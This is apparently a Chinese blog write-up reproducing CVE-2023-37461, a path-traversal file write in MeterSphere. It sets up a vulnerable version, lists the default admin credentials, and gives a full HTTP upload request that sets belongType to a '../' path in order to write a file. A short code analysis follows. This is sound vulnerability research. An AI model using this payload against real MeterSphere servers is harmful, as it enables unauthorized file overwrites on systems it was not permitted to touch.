【漏洞复现】CVE-2023-37461 Arbitrary File Writing

漏洞信息

NVD - cve-2023-37461

Metersphere is an opensource testing framework. Files uploaded to Metersphere may define a belongType value with a relative path like ../../../../ which may cause metersphere to attempt to overwrite an existing file in the defined location or to create a new file. Attackers would be limited to overwriting files that the metersphere process has access to. This issue has been addressed in version 2.10.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.

背景介绍

MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.

主页:https://metersphere.io/

源码:https://github.com/metersphere/metersphere

环境搭建

sh 复制代码
$ wget https://github.com/metersphere/metersphere/releases/download/v2.10.1-lts/metersphere-online-installer-v2.10.1-lts.tar.gz --no-check-certificate
$ tar zxvf metersphere-online-installer-v2.10.1-lts.tar.gz
$ cd metersphere-online-installer-v2.10.1-lts
$ sudo ./install.sh
$ msctl status
       Name                  Command               State                Ports         
--------------------------------------------------------------------------------------
api-test             /deployments/run-java.sh   Up (healthy)   0.0.0.0:10000->10000/tc
                                                               p,:::10000->10000/tcp, 
                                                               0.0.0.0:10001->10001/tc
                                                               p,:::10001->10001/tcp, 
                                                               0.0.0.0:10002->10002/tc
                                                               p,:::10002->10002/tcp, 
                                                               0.0.0.0:10003->10003/tc
                                                               p,:::10003->10003/tcp, 
                                                               0.0.0.0:10004->10004/tc
                                                               p,:::10004->10004/tcp, 
                                                               0.0.0.0:10005->10005/tc
                                                               p,:::10005->10005/tcp, 
                                                               0.0.0.0:10006->10006/tc
                                                               p,:::10006->10006/tcp, 
                                                               0.0.0.0:10007->10007/tc
                                                               p,:::10007->10007/tcp, 
                                                               0.0.0.0:10008->10008/tc
                                                               p,:::10008->10008/tcp, 
                                                               0.0.0.0:10009->10009/tc
                                                               p,:::10009->10009/tcp, 
                                                               0.0.0.0:10010->10010/tc
                                                               p,:::10010->10010/tcp  
eureka               /deployments/run-java.sh   Up (healthy)                          
gateway              /deployments/run-java.sh   Up (healthy)   0.0.0.0:8081->8000/tcp,
                                                               :::8081->8000/tcp      
kafka                /opt/bitnami/scripts/kaf   Up (healthy)   0.0.0.0:9092->9092/tcp,
                     ka ...                                    :::9092->9092/tcp      
minio                /usr/bin/docker-           Up (healthy)   0.0.0.0:9000->9000/tcp,
                     entrypoint ...                            :::9000->9000/tcp, 0.0.
                                                               0.0:9001->9001/tcp,:::9
                                                               001->9001/tcp          
ms-data-streaming    /deployments/run-java.sh   Up (healthy)                          
ms-node-controller   sh -c sed -i               Up (healthy)   0.0.0.0:8082->8082/tcp,
                     "s/:101:/:136 ...                         :::8082->8082/tcp, 0.0.
                                                               0.0:9100->9100/tcp,:::9
                                                               100->9100/tcp          
ms-prometheus        /bin/prometheus            Up (healthy)   0.0.0.0:9091->9090/tcp,
                     --config.f ...                            :::9091->9090/tcp      
mysql                docker-entrypoint.sh       Up (healthy)   0.0.0.0:3306->3306/tcp,
                     mysqld                                    :::3306->3306/tcp,     
                                                               33060/tcp              
nodeexporter         /bin/node_exporter         Up (healthy)                          
                     --path. ...                                                      
performance-test     /deployments/run-java.sh   Up (healthy)                          
project-management   /deployments/run-java.sh   Up (healthy)                          
redis                docker-entrypoint.sh       Up (healthy)   0.0.0.0:6379->6379/tcp,
                     redis ...                                 :::6379->6379/tcp      
report-stat          /deployments/run-java.sh   Up (healthy)                          
system-setting       /deployments/run-java.sh   Up (healthy)                          
test-track           /deployments/run-java.sh   Up (healthy)                          
workstation          /deployments/run-java.sh   Up (healthy) 

Debug1:访问Web UI有{"success":false,"message":"401 UNAUTHORIZED \"Not found session, Please Login again.\"","data":null}报错,一定要等待所有容器Up并healthy状态,后再等5min访问Web UI(不要中途切换)。

Debug2:9090端口号占用问题,在docker-compose-prometheus.ymlinstall.conf修改为9091即可。

sh 复制代码
# Debug3: Additionally
$ msctl restart gateway
$ msctl restart workstation
$ msctl restart prometheus

Web UI:http://127.0.0.1:8081

账号admin、密码metersphere

漏洞复现

参考:https://github.com/metersphere/metersphere/security/advisories/GHSA-xfr9-jgfp-fx3v

登录系统后按照如下步骤创建一个测试用例:

本地上传附件,触发Upload请求:

抓包,修改belongIdbelongType字段,发包后200 OK

POC:

http 复制代码
POST /track/attachment/testcase/upload HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br
CSRF-TOKEN: uzKF86dFBZ5H5IsT6tT1Zx3WibRCV3i9yQxwgR7zLKElhRigvfYLlvBxufS9MqxqnrIEJm2RCbAK/1pBGoEvrA==
X-AUTH-TOKEN: c34a7ff5-53b1-44ff-bd53-c03fe5c7b148
WORKSPACE: 7a6e6750-bdb8-11ef-bcf6-0242ac1e0a07
PROJECT: 7a6e9276-bdb8-11ef-bcf6-0242ac1e0a07
Content-Type: multipart/form-data; boundary=---------------------------108034667142566387213929135350
Content-Length: 480
Origin: http://127.0.0.1:8081
Connection: keep-alive
Referer: http://127.0.0.1:8081/
-----------------------------108034667142566387213929135350
Content-Disposition: form-data; name="file"; filename="hacked.php"
Content-Type: text/html
<script>alert("You are hacked\!")</script>
-----------------------------108034667142566387213929135350
Content-Disposition: form-data; name="request"; filename="blob"
Content-Type: application/json
{"belongId":"","belongType":"../../../../../../../tmp"}
-----------------------------108034667142566387213929135350--

漏洞分析

uploadAttachment方法检查了BelongType是否等于ISSUE以及TEST_CASE。如果都不是,就直接在函数saveAttachment中使用BelongType作为文件名的一部分,导致路径穿越。

相关推荐
学习溢出3 小时前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids
安胜ANSCEN3 小时前
还在靠防火墙硬抗?网络安全需要从“单点防御“转向“系统化防护“!
网络安全·应急响应·威胁检测
鹿鸣天涯4 小时前
《红蓝攻防:构建实战化网络安全防御体系》
安全·web安全
Bruce_Liuxiaowei12 小时前
dict协议在网络安全中的应用与风险分析
网络·安全·web安全·伪协议
FreeBuf_12 小时前
蓝牙协议栈高危漏洞曝光,攻击可入侵奔驰、大众和斯柯达车载娱乐系统
安全·web安全·娱乐
浩浩测试一下19 小时前
Windows 与 Linux 内核安全及 Metasploit/LinEnum 在渗透测试中的综合应用
linux·运维·windows·web安全·网络安全·系统安全·安全架构
周某人姓周1 天前
搭建渗透测试环境
网络安全·网络攻击模型
码农12138号1 天前
BUUCTF在线评测-练习场-WebCTF习题[GYCTF2020]Blacklist1-flag获取、解析
web安全·网络安全·ctf·sql注入·handler·buuctf
鼠鼠我捏,要死了捏1 天前
大规模集群下 Prometheus 监控架构实战经验分享
prometheus·monitoring·devops
爱思德学术1 天前
CCF发布《计算领域高质量科技期刊分级目录(2025年版)》
大数据·网络安全·自动化·软件工程